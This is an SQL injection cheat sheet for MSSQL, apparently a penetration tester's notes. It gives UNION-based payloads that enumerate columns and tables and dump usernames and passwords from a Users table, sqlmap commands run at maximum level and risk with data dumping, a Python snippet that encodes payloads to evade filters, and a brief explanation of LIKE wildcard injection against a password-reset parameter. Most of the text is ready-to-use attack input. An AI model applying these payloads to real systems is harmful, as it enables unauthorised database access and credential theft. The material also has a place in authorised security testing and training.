SQL Injection

MSSQL

Test

' or 1=1-- -

Identify the number of columns

Increase the column number by one each time until an error or different content appears:

' order by 1-- -
' order by 7-- -

Confirm the number of columns

' union select 1,2,@@VERSION,DB_NAME(),5,6-- -

Get tables

' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -

Get columns from table Users

' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -

Dump data from table Users

' union select 1,2,username,password,4,5 FROM Users-- -

SQLMAP

Use file

sqlmap -r file.txt --batch --level 5 --risk 3

Post request

sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3

Bypass

Encoding payload using utf-16

# Read a payload and rewrite every character as a \uXXXX escape sequence.
user_input = input('> ').strip()
# Four hex digits so characters above U+00FF are encoded correctly as well.
utf = [f"\\u{ord(i):04x}" for i in user_input]
print(''.join(utf))

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

"_" are the chars that match the wildcard